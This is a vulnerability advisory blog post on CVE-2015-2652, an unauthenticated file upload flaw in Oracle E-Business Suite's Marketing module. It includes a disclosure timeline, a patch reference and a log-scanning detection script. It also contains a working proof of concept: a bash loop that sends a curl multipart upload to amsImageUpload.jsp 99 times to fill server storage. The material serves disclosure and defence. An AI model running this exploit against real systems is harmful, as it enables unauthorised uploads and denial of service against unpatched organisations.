Vulnerability Research

CVE-2015-2652 – Unauthenticated File Upload in Oracle E-Business Suite

By Sandeep Kamble


During my regular penetration testing job, I uncovered an interesting unauthenticated file upload 0-day vulnerability in Oracle E-Business Suite. This upload bug can easily be used to upload files to the web server, and an attacker can also flood the server's hard disk, making it easier to leverage the vulnerability remotely. Oracle released a Critical Patch Update containing security fixes for Oracle E-Business Suite. The vulnerability is remotely exploitable without any kind of authentication, i.e. it can be exploited over the network without valid user credentials.

Introduction

Oracle E-Business Suite is a fully integrated, comprehensive suite of business applications for the enterprise. Most organizations use Oracle E-Business for the following purposes:
  1. Customer Relationship Management
  2. Financial Management
  3. Human Capital Management
  4. Project Portfolio Management
  5. Advanced Procurement
  6. Supply Chain Management
  7. Service Management

Vulnerable Versions

Oracle E-Business Suite, version(s) 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4

Brief About the Bug

The unauthenticated upload vulnerability resides in the Oracle Marketing component. If you search Google for Oracle E-Business, you will find more than 30K unique results. The file is uploaded into a table in the E-Business Suite database schema. The attacker, however, can use it to fill up the existing table space. The upload functionality allows the attacker to upload arbitrary file types (all executables) and also to execute the uploaded code.

Proof of Concept

Raw PoC for feeding files to the server:
# Repeat the same upload request 99 times (loop bounds as in the original PoC).
for x in $(seq 1 99); do
curl -i -s -k -X 'POST' \
    -H 'Origin: http://Oracle-Application:Port' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36' \
    -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywS9xiTn7rP23Fori' \
    -H 'Referer: http://Oracle-Application:Port/OA_HTML/amsImageSelect.jsp' \
    -b 'JSESSIONID=6e66b3f234234234272c18909d2bca0c96bf7c.kdsnfksjdfn34rk32; PROD_pses=PROD%3DHcqumhXKzuUX0xNEIjoeFKu8hZ%7E; PROD=HcqumhXKzuUX0xNEIjoeFKu8hZ; oracle.uix=0^^GMT+4:00^p' \
    --data-binary $'------WebKitFormBoundarywS9xiTn7rP23Fori\r\nContent-Disposition: form-data; name="type"\r\n\r\nF\r\n------WebKitFormBoundarywS9xiTn7rP23Fori\r\nContent-Disposition: form-data; name="FileInput"; filename="Check.txt"\r\nContent-Type: text/plain\r\n\r\n\r\n------WebKitFormBoundarywS9xiTn7rP23Fori\r\nContent-Disposition: form-data; name="fileId"\r\n\r\nnull\r\n------WebKitFormBoundarywS9xiTn7rP23Fori\r\nContent-Disposition: form-data; name="url"\r\n\r\n\r\n------WebKitFormBoundarywS9xiTn7rP23Fori--\r\n' \
    'http://Oracle-Application:Port//OA_HTML/amsImageUpload.jsp?dummy=1&jttst0=6_22646%2C22646%2C-1%2C0%2C&jtfm0=&etfm1=&jfn=ZG01DFBB7BC079CDE282F4716CF2E5B140454CA599F18AD7A2CAD711D30D5FB60DF18438A1D10EB7BD7CF1370CF9D979BDA7&oas=ddrqZePQ82zVbJrUIG7jrw..&JSSetFunctionName=null&elemName=null'
done

Vulnerability Information

By using the following URLs, the attacker can upload files on the server:
http://ORACLE-WebServer:Port/OA_HTML/amsImageSelect.jsp
http://ORACLE-WebServer:Port/OA_HTML/amsImageUpload.jsp
For security reasons, we are not releasing the uploaded file path.
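Requests to these two JSPs can be looked for in the web tier's access logs. The script below is an added example, not part of the original advisory or of any Oracle tooling: it assumes the Apache "combined" log format, a burst threshold of 3 POSTs per client, and uses constructed sample log lines. It normalises the request path first, because the PoC URL above reaches the upload page through a doubled slash.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Endpoints named in the advisory, lower-cased for comparison.
UPLOAD = "/oa_html/amsimageupload.jsp"
WATCHED = {"/oa_html/amsimageselect.jsp", UPLOAD}
BURST_THRESHOLD = 3  # assumption: tune to the environment

# Apache "combined" access log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def normalise(target):
    """Drop query/path parameters, percent-decode, collapse '//', lower-case."""
    path = unquote(re.split(r"[?;]", target, maxsplit=1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def scan(lines):
    """Return (hits, bursts): every request to a watched JSP, and the clients
    whose POST count to the upload JSP reaches BURST_THRESHOLD."""
    hits, posts = [], Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        path = normalise(m["target"])
        if path not in WATCHED:
            continue
        hits.append((m["ip"], m["method"], path, int(m["status"])))
        if m["method"] == "POST" and path == UPLOAD:
            posts[m["ip"]] += 1
    bursts = {ip: n for ip, n in posts.items() if n >= BURST_THRESHOLD}
    return hits, bursts

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2015:10:00:01 +0000] "GET /OA_HTML/amsImageSelect.jsp HTTP/1.1" 200 5120 "-" "curl/7.43"',
    '203.0.113.7 - - [15/Jul/2015:10:00:02 +0000] "POST //OA_HTML/amsImageUpload.jsp?dummy=1 HTTP/1.1" 200 312 "-" "curl/7.43"',
    '203.0.113.7 - - [15/Jul/2015:10:00:03 +0000] "POST /OA_HTML/amsImageUpload.jsp?dummy=1 HTTP/1.1" 200 312 "-" "curl/7.43"',
    '203.0.113.7 - - [15/Jul/2015:10:00:04 +0000] "POST /OA_HTML/amsImageUpload.jsp?dummy=1 HTTP/1.1" 200 312 "-" "curl/7.43"',
    '198.51.100.20 - - [15/Jul/2015:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [15/Jul/2015:10:02:00 +0000] "POST /OA_HTML/amsImageUpload.jsp HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits, bursts = scan(SAMPLE_LOG)
    print(f"{len(hits)} requests to watched JSPs; burst clients: {bursts}")
```

An access log cannot show whether a request carried a valid session, so every hit on a system that does not use Oracle Marketing image upload deserves a look, not only the bursts.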

Timeline

  • May 7, 2015: Identification of the vulnerability
  • May 8, 2015: Reported to the Oracle Security Team
  • May 12, 2015: Confirmed upload vulnerability in Oracle E-Business
  • May 22, 2015: Upload vulnerability patched
  • May 22, 2015: CPU scheduled for Critical Update
  • July 13, 2015: CVE allocated — CVE-2015-2652
  • July 14, 2015: Critical Update pushed
  • July 15, 2015: Vulnerability made public

Mitigation

Update Oracle E-Business Suite to the latest version. Oracle vulnerability reference and credit: Oracle Critical Patch Update Advisory – July 2015
